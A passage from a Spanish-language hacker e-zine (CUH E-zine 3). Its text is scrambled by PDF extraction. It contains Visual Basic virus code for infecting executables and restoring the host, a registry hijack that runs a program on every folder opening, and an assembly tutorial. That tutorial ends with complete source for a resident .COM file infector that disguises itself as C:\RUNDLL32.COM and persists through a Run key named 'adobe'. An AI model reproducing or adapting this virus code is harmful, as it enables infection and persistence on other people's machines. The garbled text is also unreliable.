    archivo temporal con los bits del fichero original, loejecute y lo elimine. As quedara en memoria el virusy el fichero infectado.Bueno, comencemos:

    Function DesinfectarFichero(Pe As String)Dim Host As String

    'Copiamos para poder abrirlo de forma _binaria.FileCopy Pe, "C:\Temporal.exe"

    'Abrimos y extraemos los bits correspondientes _al Host.Open "C:\Temporal.exe" For Binary Access Read As#1

    'Obtenemos los bits del host, pero ATENCION _para esto debemos saber los bits que tenia _nuestro virus al ser compilado, esto lo _pueden obtener en las propiedades ;)Host = Space(Len("C:\Temporal.exe") - 20382)'Obtenemos a Host.Get #1, , Host

    'Cerramos

    Close #1

    'Ahora creamos otro fichero temporal para poner _el Host, no es necesario que exista anteriormente _ya que VB lo crea si no existe.Open "C:\HostTemporal.exe" For Binary AccessWrite As #2

    'Ponemos los bits del hostPut #2, , Host

    'CerramosClose #2

    'Ejecutamos el FicheroShell "C:\HostTemporal.exe"

    'Eliminamos los archivos temporales:Kill "C:\Temporal.exe"Kill "C:\HostTemporal.exe"

  • 8/14/2019 CUH E-zine 3 Edicion

    24/69

    Programacion VB

    Infectar Ficheros Ejecutables CUH e-zine 3 EdicionEnd Function

    con esto ya habremos terminado, espero les halla

    OTAS:

    Yservido.

    NPero a pesar de que tengamos ahora esta valiosafuncin, nos hace falta modificar un poco elForm_Load, para saber ni bien se ejecute el virus sise encuentra alojado en un fichero infectado o si esejecutado desde su propio ser =P.

    tener el tamao en bytes del virus, una vez

    a infeccin de ejecutables en un virus supone un

    -Para obque lo hallan compilado se dirigen a l y le hacenclic derecho, van a propiedades y ah les dir eltamao.

    As que, vamos a agregar unas lneas al Form_Load:-Lmotor de bsqueda de archivos que realice estaaccin por todo el disco, esto lo podrn encontrarfcilmente en Internet pero yo no lo eh puesto ya quees muy largo.

    Private Sub Form_Load()'Declaramos las variables que usaremos.Dim Vx As String, Pe As String

    'Si nos estbamos ejecutando _terminamos la aplicacinIf App.PrevInstance Then End

    'Establecemos a Vx como la ruta completa _del virus.Vx = App.Path & "\" & App.EXEName & ".exe"

    '*Lneas agregadas*'Verificamos si el tamao del virus es _el correcto o pesa mas. De pesar mas _suponemos que se encuentra en un fichero _

    infectado, as que llamamos a la funcin _que "desinfecta"If Len(Vx) > 20382 Then

    Call DesinfectarFichero(Vx)

    Les envo un cordial saludo a todos los lectores de la

    Atte. ANYD00M

    rticulo escrito formalmente para la CUH E-Zine #3

    End If

    'Establecemos a Pe como la ruta completa _CUH e-zine y espero nos sigan apoyando como lohan hecho.

    del ejecutable a infectar.Pe = "C:\HOST.exe"

    'Ya tenemos lo que necesitamos, ahora _[Asolo debemos llamar a la funcin que _

    de la comunidad El-Hacker.com]infectara el archivo, pasndole como _parmetros la ruta del virus y la del _archivo a infectar (Pe o "C:\HOST.exe"Call InfectarFichero(Vx, Pe)End Sub

  • 8/14/2019 CUH E-zine 3 Edicion

    25/69

    Programacin

    Interceptar apertura carpetas CUH e-zine 3 Edicion

    INTERCEPTAR LA APERTURA DE CARPETAS By ANYD00M

    INTERCEPTAR LA APERTURA DE CARPETASLo que veremos a continuacin es unamanera de interceptar la apertura deuna carpeta (cualquier carpeta). Elarticulo que sigue se aplicara al

    lenguaje Visual Basic 5.0 o 6.0 y tratasobre como modificar el registro..

    Esta tcnica es muy simple y no tiene mucho queexplicar, as que vemoslo:

    Cuando se abre una carpeta, al igual que al intentarabrir un fichero, se producen una serie deoperaciones que lleva a cabo Windows sobre el

    registro para saber con que debe mostrar elcontenido de dicha carpeta.

    Esta tcnica se ah visto aplicada a virus, que, comoya saben, las carpetas no se pueden infectar en si,sino su contenido, y esto es lo mas cercano a infectaruna carpeta (abrir la misma y que se abra el virustambin). Lo que veremos nosotros no ser comoaplicarla a un virus, ya que no me interesaraensearles eso, sino aplicrselo a una simpleaplicacin que nos puede servir como seguridadpara nuestras carpetas.

    Como lo haremos? Pues no creare una aplicacinde seguridad para carpetas, pero seguramenteentenders como se puede hacer despus de leeresto.

    Cuando hacemos doble clic sobre un icono decarpeta, estamos enviando un comando a Windows yeste comenzara a analizarlo. Pues bien, Windowsreconoce que a lo que se le hizo doble clic era a unacarpeta, as que Qu clave de registro tiene queleer para saber como y con que abrirlo? Dicha clave

    como ya se deben haber imaginado esta enHKEY_CLASSES_ROOT y es Directory (Completa:HKEY_CLASSES_ROOT\Directory). Esta clavecontiene otra clave llamada Shell y esta clave tiene

    un valor, que por defecto ser none (o estar vaci

    en algunos casos, creo..). Dicho valor (none) es laaccin que va a cumplir Windows, y la buscara enlas claves que se encuentren dentro de Directory. Sino encuentra dicha accin (none no la va aencontrar por defecto) abrir la carpeta con el

    archivo Explorer.exe ubicado en el directorio deWindows (%SystemRoot%).

    Lo que haremos nosotros ser cambiar esa accin,none, por una nuestra. Luego agregar esa accin ala clave Directory y cuando Windows encuentre la

    clave de la accin lo que pedir ser la aplicacincon que hay que abrir la carpeta, y pues esta sernuestra aplicacin.

    Veamos esta pequea imagen hecharudimentalmente en el Paint xD

    Como vern, la clave final que debemos modificares: HKEY_CLASSES_ROOT\Directory\Shell ydebemos cambiar su valor por defecto por unaaccin inventada por nosotros, por ej. PROTECTO

    Luego debemos aadir esa accin, para ellodebemos crear una clave dentro de Shell con elnombre PROTECTO y en su valor por defectoponer nuestra aplicacin..

  • 8/14/2019 CUH E-zine 3 Edicion

    26/69

    Programacin

    Interceptar apertura carpetas CUH e-zine 3 Edicion

    Esto seria as:

    Private Sub CrearAccion()Dim Wss as object, Yo as stringYo = App.Path & \ & App.EXEName & .exeSet Wss = CreateObject(Scripting.FileSystemObject)Aplicamos la accin:Wss.RegWriteHKEY_CLASSES_ROOT\Directory\Shell\,PROTECTOCreamos la accion:Wss.RegWriteHKEY_CLASSES_ROOT\Directory\Shell\PROTECTO\, Yo & %1End Sub

    Con esto ya correramos nuestra aplicacion cada vezque se intente abrir una carpeta. Pero no se estaraabriendo la carpeta, as que la idea seria que en elForm_Load agreguen unas lneas, que verifiquen sinuestra aplicacin esta recibiendo comandos (sehace con el objeto Command$) y si esos comandoscorresponden a una carpeta (lo hacemos conGetAttr). Pero antes debemos arreglar una cosita delcdigo anterior, lo que debemos hacer es agregardespus de nuestra aplicacin en la clavePROTECTO esto: %1 (sin Comillas) esocorresponde a la carpeta que se quiere abrir, paraWindows %1 es una variable ;-)

    As que antes de empezar con el Form_Load,arreglemos esa lnea, que nos queda as:

    Wss.RegWriteHKEY_CLASSES_ROOT\Directory\Shell\PROTECTO\, Yo & %1

    Y no olviden poner el espacio antes del %1 ya quesino lo hacemos, no lo enva como comando...Ahora si, pasemos al Form_Load:

    Private Sub Form_Load()Verificamos si recibimos comandosIf Command$ then

    Si es as, miramos si es una carpetaIf GetAttr Command$ = VbDirectory Then

    Si es una carpeta, la abrimos con elExplorer.exe

    Shell %SystemRoot% & \Explorer.exe & Command$

    End ifEnd ifEnd Sub

    Y listo! Ahora si, con eso nos ejecutamos cuando seabre una carpeta y abrimos dicha carpeta.Si quieres hacer una especie de aplicacin paraproteger carpetas y todava no se te prendi lalamparita, te dar una idea (pero no har cdigo ;-))Con el objeto Command$ recibimos la ruta de lacarpeta que se esta queriendo abrir, as que,previamente tendremos supnganse un archivo, quecontendr todas las carpetas que se desea proteger.As que al recibir los comandos, los comparamos, sies igual a alguno de los que esta en el archivo,pedimos contrasea para abrirlo, si la contrasea esvalida la abrimos, sino no la abrimos. Eso es unapequea idea que les podr ayudar.

    Me despido, les envo un cordial saludo.

    ANYD00M

  • 8/14/2019 CUH E-zine 3 Edicion

    27/69

    Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion

    INTRODUCCION AL ASM II By The Shadow

    INTRODUCCION AL ASM IIORIENTANDONOS AL CRACKING y VirII

    CoDiNgUno de los principales usos que

    se le puede dar a tener un poco de conocimiento delensamblador, es no estar perdido en tus primerasaproximaciones en el cracking.

    En este segundo tuto intentare darles unaorientacin bsica a lo que es el assembler que usanlos crackers para crackear (XD), sin alejarnos delobjetivo artstico de aprender a programar enassembler con aplicacin a la creacin de virus.

    PD: Algunos puntos de inters para el cracking,como lo son los registros, los obviar en este tutoya que en la primera parte los expuse.

    Algo que tenemos q recordar es el registro IP.

    Cuando me refiera a IP, quiero decir Puntero deInstruccin, el cual recordaremos que es donde seubica la instruccin que se esta ejecutando en unprograma.

    0- Instruccin LEALEA ~ Load Effective Adress ~ Cargar

    direccin efectivaBsicamente realiza la funcion de mov, calcula eloffset del operando origen, y lo almacena en eldestino

    Sintaxis: lea (reg/pos),(reg/pos)

    Ejemplo: lea ax,dx

    1- Instrucciones INC y DEC:

    Estas instrucciones son sumamente simples,pero tengo q explikrlas ya q las usaremos despus.Weno imagnense que es como set a=%a%+1 enbatch o a++ en C.

    INC ~ Increment ~ Incrementa: como su nombre lodice, aumenta en uno el valor de un registro o deuna posicin de memoria.DEC ~ Decrement ~ Decrementa: como su nombre lo

    dice, disminuye en uno el valor de un registro o deuna posicin de memoria.

    Ejemplos:INC DX ;Incrementa DX en unoDEC DWORD PTR [DI+102] ;Decrementa en uno elvalor del DWORD ubikdo en [DI+102] del segmentoactual

    2- Instrucciones de comparacin CMP y TEST:Los valores que contienen las flags que utilizan lossaltos, los determinan otros comandos, estos son los"comparadores", de estos podemos mencionar losmnemonicos "cmp" y "test", de los cualesestudiaremos el "cmp".

    -Sintaxis del "cmp":cmp v1,v2

    --donde "v1" corresponde a: un valor hex, unregistro o una posicin de memoria. Al igual que"v1", "v2" tambin representa un valor. As, "cmp

    v1,v2", tomara "v1" como valor de destino y "v2"como valor fuente, luego resta el valor fuente menosel valor de destino y actualiza las flags con elresultado. CMP equivale a un SUB lgico, solo q noguarda sus resultados en los registros, pero siactualiza las flags

    TEST ~ Comprobar: Equivale a hacer un ANDlgico, solo q no modifica registros, solo actualizalas flags.

    3- Manejando saltos condicionales:

    En lenguajes de alto nivel, como el basic, se tienencomandos o sentencias que permiten tener un controlsobre las sentencias que se ejecutan en un

  • 8/14/2019 CUH E-zine 3 Edicion

    28/69

    Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicionprograma, a estas les llamaremos "sentenciascondicionales", ya que toman en cuenta elcumplimiento de una condicin para seguir con lasiguiente; entre estos comandos podemos ver: el"if"(como principal); while; until; etc.

    En asm tambin tenemos mnemonicoscondicionales, los cuales cada uno de ellosrepresenta una condicin especifica. Como principal

    ejemplo tenemos a los saltos. Estos saltos estancondicionados por los valores que poseen las "flags"(registros especiales que vimos en el 1er tuto). Comoya hemos vistos, el mnemonico "jmp" ~ jump ~saltar.. se utiliza para saltar a una posicinespecifica de memoria determinada ya sea por unaetiqueta(en leguajes de macro como en el "TASM") opor una direccin de offset. Tcnicamente esto lohace incrementando el valor de IP (Puntero deInstruccin). Equivale a un GOTO.

    Ejemplos:

    JMP 0046D24C ;salta a CS:0046D24C.JMP etq1 ;salta a la etiqueta "etq1" dentro delmacro..

    Hay varias derivaciones segn la activacin dediferentes flags. As las derivaciones son:

    Hexadecimal Assembler Significa75 o 0F85 Jne Salta si no es equivalente

    74 o 0F84 Je Salta si es equivalenteEB Jmp Salta directamente a . . .

    90 Nop( No OPeration ) Sinoperacin

    77 o 0F87 Ja Salta si esta sobre

    OF86 Jna Salta si no esta sobre

    0F83 Jae Salta si esta sobre o igual

    0F82 JnaeSalta si no esta sobre oigual

    0F82 Jb Salta si es inferior

    0F83 Jnb Salta si no es inferior

    0F86 JbeSalta si esta debajo oigual

    0F87 JnbeSalta si no esta debajo oigual

    0F8F Jg Salta si es mayor

    0F8E Jng Salta si no es mayor

    0F8D Jge Salta si es mayor o igual

    0F8C JngeSalta si no es mayor oigual

    0F8C Jl Salta si es menor0F8D Jnl Salta si no es menor

    0F8E Jle Salta si es menor o igual

    0F8F JnleSalta si no es menor oigual

    tabla sacada de la red

    En la tabla podemos ver el cdigo en hexadecimal,el mnemnico y su significado.

    Weno, para tenerlo mas claro veremos un ejemplo:

    MOV DX,00 ;dx==00INI:INC DX ;incrementa el valor dx en 1 dx+1CMP DX,05 ;compara dx con 05JE FOK ;si dx=05 salta a la etiqueta FOKJMP INI ;sino salta a la etiqueta INI

    FOK:MOV AH,4C ;ah==4C

    Lo que akabamos de ver es un simple bucle queestablece el valor de dx en 00 luego cuando entra enla etiqueta ini, se incrementa el valor de dx, o sea

    que, si antes de entrar en la etiqueta dx era 00despus del INC DX, dx tomaba el valor de 01 y assucesivamente mientras se mantuviera en el bucle,luego de que el valor de dx se incrementa, este secompara con el valor 05, si la flan equal seactiva, entonces salta a la etiqueta FOK, sinovuelva a INI.

    Esto es algo que veremos muy frecuente eningeniera inversa.

    3.1-Saltos cortos, cercanos y largos.

    Hay veces que necesitamos indicar que tipode salto realizaremos dependiendo de tan lejossaltaremos.

    JMP SHORT ~ Salto corto: Se realiza si vamos asaltar a una direccin comprendida entre lo q puededos bytes (-128 a +127 antes o despus de IP actual).00402207 JMP SHORT 402100

    JMP NEAR ~ Salto cercano: Se realiza si vamos asaltar a una direccin comprendida entre lo q puedeun byte (-32768 a +32767 antes o despus de IPactual).00402207 JMP NEAR 404010

    Un salto largo es ya cuando se tiene comodistancia el contenido de 4 bytes. Este tipo de saltosse ven cuando un programa llama a una funcin deun modulo.Por ejemplo para saltar a USER32.GetDlgItemTextAdesde el app.00401171:

    ------------------------------------------app.exe----------

  • 8/14/2019 CUH E-zine 3 Edicion

    29/69

    Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion00401171 JMP DWORD PTRDS:[]---------------------------------------------------------------

    Algo que tenemos que tomar en cuenta esque las especificaciones de corto, cercano y lejano,tambin debemos especificarlas en las dems

    derivaciones de saltos (los condicionales), claro,cuando sea necesario.

    4- Instrucciones PUSH y POP. La PILA o STACK

    Para empezar con esto, tengamos estediagrama en mente:

    PUSH Y = mete el valor de Y en el almacnPOP X = saca y guarda, el ultimo valor metido en elalmacn, en X

    Almacn =| || || |

    | _ _ |

    A = 1B = 2C = 3D = 0

    PUSH A| || || |

    | _1_ | PUSH C

    | || || 3 |

    | _1_ | PUSH B

    | || 2 || 3 |

    | _1_ | POP D

    . . . . . . . .D = 2 . : | : | | |

    | 2 | | || 3 | | 3 || _1_ | | _1_ |

    Ahora veamos como se vera este diagrama en asm:MOV AH,01 ;AH=01MOV AL,02 ;Al=02MOV DH,03 ;DH=03MOV DL,00 ;DL=0

    PUSH AH ;AH a stackPUSH DH ;DH a stackPUSH AL ;AL a stackPOP DL ;recordemos q el ultimo valor en entrar a lapila fue el de AL, y AL vale 02 asiq DL=02

    Por si acaso:

    PUSH X ~ Meter: Mete el valor de el registro X en lapilaPOP Y ~ Sacar: Saca y guarda en el registro Y elultimo valor introducido en la pila.

    La pila es como un almacn donde seguardan valores de los registros. Recordemos que ladireccin de la pila esta especificada por losregistros:SS:SP (Stack Segment:Stack Pointer ~ Segmento de lapila:Puntero actual de la pila).

    5- Instruccin LOOPWeno esencialmente, esta instruccin la usaremos ala hora de crear bucles y no qeremos meternos conmov-inc-cmp-jne. Bsicamente lo que hace LOOP escomparar CX con 0 si CX=0 entoncs continua con lasiguiente instruccin si no vuelve a su parmetro.LOOP decrementa el valor de CX cada ves que IP seubica en el.

    -Su sintaxis es:

    LOOP PARAM

    -- donde PARAM es la instruccin a la cual volvera IPsi CX no es igual a 0

    Ejemplo:

    MOV CX,05hINI:

    LOOP INIFOK:

    6- Instrucciones CALL Y RET:

    La orden CALL equivale a un CALL en batch.Y RET equivale a GOTO :EOF en batch. Su sintaxises como la del JMP, se permiten etiquetas, registros,direcciones de memoria. CALL lo que hace esintroducir IP+1 en la pila, o sea la instruccin quesigue al CALL, y salta a la direccin que se le indica,RET toma el valor que introduce el CALL en la pila, ysalta a el.

    Ejemplo en Batch:SET NOMBRE=JORGECALL :EC %NOMBRE%EXIT:EC

  • 8/14/2019 CUH E-zine 3 Edicion

    30/69

    Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 EdicionECHO %1GOTO :EOFEjemplo en ASM:NOM DB "JORGE$".CODEINI:

    MOV AX,@DATAMOV DS,AXMOV DX,OFFSET NOMMOV AH,9CALL XXIJMP OTERXXI:INT 21HRET

    6- Funciones dentro de un programa escrito enTASM.

    En lenguajes como el BASIC, tenemos laopcin de tener subrutinas las cuales podemosllamar en cualquier momento asi podemos ver enBASIC:Sub sumd(Dim var as Integer)var = var + 1End Sub

    En TASM tambin podemos tener funciones.As podemos ver el ejemplo en BASIC en TASM:sumd macro var

    mov dx, varinc dxENDM

    Donde sumd es el nombre del macro,

    macro especifica que una funcin y var se refiere ael argumento de la llamada.

    Las funciones se deben especificar antes deel cdigo (segmento .code o .text).

    7- Estructura de un ejecutable escrito en TASM (2daforma)

    En el tuto anterior aprendimos una forma deestructura para crear un programa con TASMmediante la definicin concreta de los segmentos decdigo, esta vez aprenderemos otra forma en la cualasumiremos los segmentos en el proceso principal.

    Sintaxis A (Estableciendo todos los segmentos):---------------------------------------------------------------

    ;definicin de constantes y modelo;macros

    ------------------------------------stack---------------------stac SEGMENT PARA STACK 'stack'

    ;definicin de bufferstac ENDS------------------------------------segmento .data---------data SEGMENT PARA PUBLIC

    ;definicin de valoresdata ENDS------------------------------------segmento .code---------codi SEGMENT PARA PUBLIC 'code'

    prin PROC FARASSUME CS:codi, DS:data, SS:stac, ES:eseg

    ;codigo del programaprin ENDPcodi ENDSprin END------------------------------------segmento extra---------eseg SEGMENT PARA PUBLIC

    ;cdigoEseg ENDS--------------------------------------FIN---------------------

    Sintaxis B (Asumiendo segmentos sin definirlostodos):

    ---------------------------------------------------------------;definicin de constantes y modelo;macros

    ------------------------------------segmento .code---------codi SEGMENT PARA PUBLIC 'code'prin PROC FAR

    ASSUME CS:codi, DS:codi, ES:codi;codigo del programa

    prin ENDPcodi ENDSprin END-------------------------------------FIN----------------------

    Nota: Si no necesitamos establecer la pila, bienpodemos omitir su inclusin en el programa.

    8- Programa de practica:Weno como programa de practica haremos un codealgo rebuskdo pero q en fin nos ayudara a veralgunas estructuras que vimos en este tuto, ademsde algunos servicios de la int 21h y una inclusinpara los q somos batch coderz, como podemosfusionar un archivo .bat y uno .com! .. xD

    .286;especificamos el modelo

    prog segment byte public 'CODE'assume cs:prog, es:prog, ds:prog

    ;definimos segmentosorg 100h

    ini:;escribimos el codigo batch q se ejecutara en .bat

    db '@ECHO OFF',0dh,0ahdb ':'jmp hma

  • 8/14/2019 CUH E-zine 3 Edicion

    31/69

    Hacking Newbie

    Introduccion Al ASM II CUH e-zine 3 Edicion;cuando se ejecuta el .com aki saltamos al areavirica

    db 0dh,0ahdb 'COPY %0.BAT '

    virr_com: db 'C:\RUNDLL32.COM'db '>NUL',0dh,0ah

    db'reg addHKLM\software\microsoft\windows\currentversion\

    run /v adobe /d "C:\RUNDLL32.COM" /f',0dh,0ahdb 'C:\RUNDLL32.COM',0dh,0ahdb 1ah

    copi label byte;aki especificamos donde comienza el fragmento acopiararch: db "*.com",0;especificamos el tipo de archivos a infectarhma proc near

    mov di,0ffffhmov bx,copif-a_hma+05hmov ax,4a02h ;ya

    estamos residentes?int 2fhinc dijz salr ;si ya

    estamos residentes, nos vamospush dicld ;flag de

    acarreo a 0mov si,offset a_hma ;comienza

    desde el offset de a_hmamov cx, copif-a_hma ;cantidad a

    pasarrep movsb ;pedimos

    residencia en hmahma endpa_hma label bytecodi proc near

    mov ah,04eh ; servicio 4eh(buscar primer archivo del directorio actual)

    lea dx,arch ; CX =atributosint 21h ; DS:DX ->

    filespec ;(en nuestro caso: archive ~ *.com)

    enc_arch:mov ax,3d02h ; servicio 3dh

    (Abrir archivo)mov dx,9eh ; DS:DX ->

    nombre del archivo (en nuestro caso usamos el9eh~dta del 4eh)

    int 21h ; AL =modo de apertura .. 2 leer y escribircopir_arch:

    mov cx,copif-copi ; servicio 40h(escribir en archivo)

    lea dx,copi ; CX =numero de bytes a escribir

    mov ah,40h ; DS:DX ->buffer

    int 21hmov ah,3eh ;servicio 3eh

    (cerrar archivo)int 21h

    cont:mov ah,4fh ;servicio 4fh

    (buscar siguiente archivo)int 21hjnb enc_arch ;si existen

    mas archivos, los infectamos, sino terminamos

    salr:int 20h

    ;devolvemos controlcopif label byte ; lo usamospara cuestiones del cantidad de bytes a copiarcodi endpprog ends

    end ini

    El programa es un infectador de archivos.com residente, el programa es bastante sencillopero nos ayudara a tener algunos conceptos enorden, adems que vemos la tcnica de residenciapor hma (high memory acess) y algunos servicios demanejo de archivos, si bien no se pudo explikr bienel programa a sido por cuestiones de espacio eintentando que el lector desarrolle la habilidad deinvestigar, corregir errores y analizar.

    Me conformo con q un 70% haya podido sercomprendido =D .. Saludos y hasta la prxima!

    The Shadow

  • 8/14/2019 CUH E-zine 3 Edicion

    32/69

    Programacion

    Manual Batch CUH e-zine 3 Edicion

    Manual de Batch By Espectro Infernal

    MANUAL UTILIDAD FOR + CALL + ETIQUETABueno, en este manual voy aexplicar uno de los usos msfrecuentes y habituales en el

    comando FOR. Es una utilidad fcilde aprender (si ya se sabe manejar con

    las funcionalidades bsicas del FOR) y a la vez, muytil. Saber utilizar correctamente y con ingenio estautilidad